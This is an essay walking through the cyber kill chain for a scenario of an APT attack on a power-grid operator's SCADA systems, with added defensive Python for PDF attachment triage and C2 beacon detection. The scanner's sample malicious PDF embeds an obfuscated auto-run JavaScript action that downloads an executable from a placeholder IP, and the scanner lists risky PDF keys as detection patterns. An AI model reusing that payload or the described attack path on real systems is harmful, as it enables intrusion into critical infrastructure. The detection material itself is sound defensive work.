Cyberwarfare campaigns are carried out in a recognizable sequence of phases referred to as the cyber kill chain. The term comes from the military targeting cycle: find the right target, fix attention on it, track it, select the tools for the planned attack, engage the target, and finally assess the damage done. If the result is unsatisfactory, the attacker plans a further and more damaging attack. In the cyber setting the cycle is summarized in seven major steps: reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives, as outlined below (Sager, 2014). The major reason for studying the cyber kill chain is to gain a better understanding of how attackers work and what motivates them (Hutchins, Cloppert, & Amin, 2016). Knowing their pattern of action helps defenders detect cyberattacks at each phase and formulate better defense mechanisms against them.
Notably, understanding the cyber kill chain is the first step in identifying the supply chain vulnerabilities and the probable attack entry points that the suspected APT activity has on the computers of the Western Interconnection power grid. The severity of the attack on the power grid will therefore be assessed against the cyber kill chain, and the most relevant recommendations for defending against the planned APT attack will then be made.
A1. Reconnaissance
Reconnaissance refers to the actions taken to gain information about the target before an attack is planned or conducted. As a cyber kill chain step, it covers the activities attackers engage in to spot weaknesses and vulnerabilities in the target's computer systems. The major resources used at this stage are the target's public websites, social media, and other public information about the target's members of staff; email addresses, mailing lists, and conference proceedings are among the information sets researched by the attackers (Stouffer, Pillitteri, Lightman, Abrams, & Hahn, 2015).
In the power grid scenario, the APT attackers must have targeted the power grid because it is a major ICS, especially in the western portion of the continent. They must have used the vulnerability introduced by the previously downloaded SCADA software component, an ActiveX control, installed on the organization's web server about eight months ago, which is the period in which the APT attack is thought to have been initiated.
A2. Weaponization and Delivery
After the attackers have identified their targets, they set out to weaponize the information gathered: it is analyzed so that they can develop the most appropriate way to attack. The attackers choose whether to attack the target's firewall, its operating systems, or any other technology in use. At this stage the attackers may also develop the attack around a particular person within the target organization and select a major endpoint from which to initiate it. The weaponized tool may be an automated tool deliverable to the target's system or an infected document such as an MS Word or Adobe PDF document.
Once the information has been weaponized, the attacker determines how to deliver the attack into the target's system. One major means of delivery is the drive-by download, where the weaponized content is served to the victim's browser when the victim visits a compromised website or web application, so the target's own website or other web applications can be delivery channels. For this to work the web application has to be vulnerable, for example to cross-site scripting or content injection, so that attacker-controlled content can be planted on it. Notably, the major goal at this stage is to transmit the weaponized tool to the target's premises (Hutchins, Cloppert, & Amin, 2016). Weaponized payloads are also delivered via USB removable media and email attachments, through which infected documents or other tools reach the target's system.
The APT actors had accessed the web servers of Western International and attached an infected Adobe PDF which appeared to be the activation manual for the newly incorporated software. The weaponized document was then downloaded as an email attachment, by which means the attackers must have managed to deliver it into the organization's system.
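A weaponized PDF of the kind described above usually carries an automatic action (/OpenAction or /AA) that runs JavaScript, launches a program or opens an embedded file. The following triage script is an added example written for this page, not code from the essay or from any cited source. It assumes nothing about the organization's mail system: it takes raw attachment bytes, undoes the #XX hex escaping that PDF allows inside names (so that /J#61vaScript is recognized as /JavaScript), counts the risky name tokens, and produces a weighted score. The weights and the threshold are this example's own heuristic, and the two sample documents are constructed inline.

```python
import re

# Weights for PDF name tokens that indicate active content or automatic
# execution. These weights are this example's own heuristic, not a standard.
RISKY_KEYS = {
    "/JavaScript": 3,    # JavaScript action dictionary
    "/JS": 3,            # the script itself (string or stream)
    "/Launch": 3,        # launch an external program
    "/OpenAction": 2,    # action run when the document is opened
    "/AA": 2,            # additional (event-driven) actions
    "/EmbeddedFile": 2,  # embedded file attachment
    "/RichMedia": 2,     # Flash / rich media annotations
    "/URI": 1,           # external link, low weight on its own
}


def normalize_names(data: bytes) -> bytes:
    """Decode the #XX hex escape allowed in PDF names, so that an obfuscated
    token such as /J#61vaScript compares equal to /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes, threshold: int = 3) -> dict:
    """Return a triage record for one attachment: which risky names appear,
    how often, a weighted score, and how many compressed object streams
    (/ObjStm) exist, since names inside those are opaque to this scan."""
    if not data.startswith(b"%PDF-"):
        return {"is_pdf": False, "hits": {}, "score": 0,
                "opaque_objstm": 0, "suspicious": False}
    norm = normalize_names(data)
    hits = {}
    for key in RISKY_KEYS:
        # A name ends at the first character that cannot be part of a name,
        # so /JS is not counted inside /JSx and /AA is not counted inside /AAB.
        pattern = re.escape(key.encode()) + rb"(?![A-Za-z0-9_])"
        count = len(re.findall(pattern, norm))
        if count:
            hits[key] = count
    score = sum(RISKY_KEYS[k] * n for k, n in hits.items())
    objstm = len(re.findall(rb"/ObjStm(?![A-Za-z0-9_])", norm))
    return {"is_pdf": True, "hits": hits, "score": score,
            "opaque_objstm": objstm, "suspicious": score >= threshold}


# Constructed samples for this example (not real attachments). The first mimics
# a document that runs JavaScript as soon as it is opened, with the action
# name hex-escaped the way a weaponized file might hide it from naive matching.
WEAPONIZED = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /S /J#61vaScript /JS (app.launchURL('http://203.0.113.9/x.exe')) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

BENIGN = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for name, doc in (("weaponized", WEAPONIZED), ("benign", BENIGN)):
        print(name, scan_pdf(doc))
```

A non-zero opaque_objstm count means the real verdict needs the object streams inflated first (for example with a full PDF parser); this string-level pass is a first filter for mail-gateway triage, not a replacement for sandbox detonation of the attachment.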
A3. Exploitation and Installation
Delivery of the attack tools is followed by the exploitation stage, in which the malware is activated or triggered on the target's premises. In other words, the code is executed so that it installs itself into the system, spreads within it, or hides within it. A specific endpoint (or a server such as the DNS server) is first infected, after which the infection spreads to other systems within the target, rapidly if it is designed to do so. Exploitation also offers the attackers a way to pursue their objectives by scanning the target's servers or applications (Assante & Lee, 2015). The infection can also remain hidden within the system in order to evade security detection and processes.
The infection may tamper with the target's security systems so that it goes undetected and is treated as genuine. Notably, the attacker may exploit the target's personnel themselves so that they trigger the installed malware, which may be a set of disguised code. Also important to note, the installation process mostly involves a remote access Trojan (RAT) so that the attacker can maintain persistence on the target's premises.
In our scenario, the attackers had successfully delivered their malicious document; it was installed the moment the document was opened, and they began exploiting the security personnel's (the Senior IT Officer's) emails. This gave them access to confidential security authentication credentials. They then made their way into the security system, including the surveillance system, and have since been monitoring the organization's operations over the course of several months.
A4. Command and Control
At this stage, the attackers establish command and control channels between their systems and the target's systems. These channels enable communication in both directions and allow the attacker to send instructions and receive data. The traffic is typically encrypted so that the attack remains hidden from the target. Specifically, APT attacks often involve manual interaction with the target hosts rather than fully automated control, at least in the initial steps of the attack, with the RAT used in later steps.
The command and control stage may begin immediately after the malware is installed on the target system, or the malware may be set to call back only after a preset time. Command and control servers are normally positioned as intermediate systems between the attacker and the target. These servers hide the attacker's true IP address so that the target is unable to determine the attacker's identity; this hiding of identity is a major role of command and control infrastructure.
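Encryption hides what a command and control channel carries, but not when it is used: a RAT that checks in on a timer produces outbound connections with a near-constant gap, which human browsing does not. The detector below is an added example written for this page, not code from the essay or from any cited source. It assumes a proxy or firewall log in a simple whitespace-separated format (timestamp, source IP, destination IP, bytes), constructed inline here, and flags source/destination pairs whose inter-connection gaps have a low coefficient of variation. The thresholds are this example's assumptions.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy/firewall log lines for this example (not from any real
# system). Format: "<ISO timestamp> <source IP> <destination IP> <bytes out>".
# 10.20.5.17 -> 203.0.113.9 checks in roughly every five minutes with a few
# seconds of jitter, the signature of an automated RAT beacon; the flows to
# 198.51.100.4 are ordinary, irregular browsing from the same host.
SAMPLE_LOG = """\
2024-03-01T08:00:00 10.20.5.17 203.0.113.9 412
2024-03-01T08:01:13 10.20.5.17 198.51.100.4 15230
2024-03-01T08:02:40 10.20.5.17 198.51.100.4 8812
2024-03-01T08:05:01 10.20.5.17 203.0.113.9 410
2024-03-01T08:09:59 10.20.5.17 203.0.113.9 415
2024-03-01T08:15:00 10.20.5.17 203.0.113.9 411
2024-03-01T08:17:05 10.20.5.17 198.51.100.4 2201
2024-03-01T08:17:09 10.20.5.17 198.51.100.4 77015
2024-03-01T08:20:02 10.20.5.17 203.0.113.9 409
2024-03-01T08:24:58 10.20.5.17 203.0.113.9 413
2024-03-01T08:30:00 10.20.5.17 203.0.113.9 412
2024-03-01T08:35:01 10.20.5.17 203.0.113.9 414
2024-03-01T08:40:30 10.20.5.17 198.51.100.4 3300
2024-03-01T08:41:00 10.20.5.17 198.51.100.4 1200
"""


def parse_log(log: str) -> dict:
    """Group connection timestamps by (source, destination) pair."""
    flows = defaultdict(list)
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, src, dst, _nbytes = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(ts))
    return flows


def beacon_candidates(log: str, min_count: int = 6, max_cv: float = 0.1) -> dict:
    """Flag (src, dst) pairs whose inter-connection gaps are nearly constant.
    min_count is the minimum number of connections before a pair is judged;
    max_cv is the largest coefficient of variation (stdev / mean of the gaps)
    still treated as machine-regular. Both thresholds are this example's
    assumptions and should be tuned against the organization's own traffic."""
    flagged = {}
    for pair, times in parse_log(log).items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            flagged[pair] = {
                "connections": len(times),
                "period_s": round(mean, 1),
                "jitter_cv": round(cv, 3),
            }
    return flagged


if __name__ == "__main__":
    for (src, dst), info in beacon_candidates(SAMPLE_LOG).items():
        print(f"possible beacon {src} -> {dst}: {info}")
```

Real implants add random sleep jitter and vary their check-in interval, so in practice max_cv is tuned upward and the result is combined with destination reputation and byte-count uniformity; this timing view also says nothing about a channel that bypasses the monitored network path, such as one established through a field-site modem.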
As already noted, the attackers gained command and control of the organization's surveillance and operational details as soon as the document for the installation of the ActiveX software was installed on the organization's web server. They have been observing the company's operations, especially its schedule, so that they can plan how to install the main attack malware into the power grid. There is a high probability that an insider will enable the second and major attack on the system, which is estimated to disrupt power transmission to the eleven states served by the organization. As shown in Figure 1, the insider only needs to access modem site 1 or field site 3 to install the final malware, after which the attackers can access the PLC and the RTU at will.
Figure 1: SCADA System General Layout showing the at-will malware delivery points (labelled "at-will entry points") for the organization.
A5. Actions
At this stage, the attackers have all the access they need to the target's system and proceed to carry out what they intended from the beginning. Notably, only a few cyberattacks make it this far. Those that do usually have one or more of the following objectives. First, the attackers may intend to leverage the initial compromise to perpetrate a bigger attack at a later time. Second, they may aim to distort information or data in the target's system so as to mislead the victims into a given course of action (Assante & Lee, 2015). Third, the perpetrator may aim to gain intelligence on a given matter, which he or she monitors through the installed malware. Lastly, the attackers may aim to steal sensitive information from the target's system, whether stored directly on the infected device or on other devices that the malware can reach and hence infect.
In other words, this stage is where the attackers accomplish their main purpose, even though in many cases they are apprehended before the original objectives are achieved. For instance, the initial course of action of the malware installed in the Western International organization was concluded to be gathering of intelligence. This is, however, only the initial drizzle before the onset of a big storm aimed at disrupting power grid transmission as described above. The organization is advised to act with the utmost speed in mitigating the oncoming attack, since the time of the attack is not yet known.
Defense in Depth
Given the articulation and sophistication of the cyber kill chain and its ultimate results, a susceptible organization must make considerable effort to defend itself against such attacks. A number of strategies exist that any potential target could adopt to become, at least to some extent, resistant to cyberattack. In this document, the defense in depth strategy is explored as the primary way out of cyberwarfare. In today's world, where APT attacks are common and systems are highly interconnected, defense in depth is a sound way of achieving information assurance (Lockheed Martin Corporation, 2015).
The cost of protection, the vulnerabilities, the performance, and the operational considerations of the protection measures are the major concerns of the defense in depth strategy. Hence, the strategy defines protection around three major constituents of a vulnerable firm or target: the people, the technology, and the operations of the potential target, as discussed below.
It will be noted that the defense in depth strategy is a paradigm hinged upon protection, detection, and reaction to the specific cyber threats a system is exposed to, such that if the attacks succeed the victims can make a full recovery. Given the nature of the ICS at stake at Western International, the malware, if triggered, will lead to...